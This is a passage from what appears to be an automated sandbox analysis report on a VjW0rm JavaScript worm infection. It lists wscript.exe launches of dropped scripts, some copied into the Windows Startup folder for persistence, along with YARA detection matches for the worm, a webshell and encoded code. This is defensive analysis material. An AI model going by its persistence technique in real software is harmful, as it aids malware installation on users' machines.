              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000A.00000002.881711321.00000239FAA0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000A.00000002.880995729.00000239F8BE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              General

              Target ID:12
              Start time:23:10:17
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js"
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000C.00000002.880769506.00000171E040E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 0000000C.00000002.880832784.00000171E0417000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000C.00000002.880832784.00000171E0417000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000C.00000002.881396869.00000171E222F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

              General

              Target ID:16
              Start time:23:10:25
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js"
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000010.00000002.882089368.00000244AF3F0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000010.00000002.880524674.00000244AD5E3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000010.00000002.883937570.00000244AFD70000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000010.00000002.880727385.00000244AD604000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000010.00000003.457112240.00000244AF413000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth

              General

              Target ID:18
              Start time:23:10:29
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000012.00000002.881139684.0000026BB35D2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
              • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

              General

              Target ID:19
              Start time:23:10:34
              Start date:17/05/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XZqsVjnTsr.js"
              Imagebase:0x7ff6e8370000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Disassembly

              No disassembly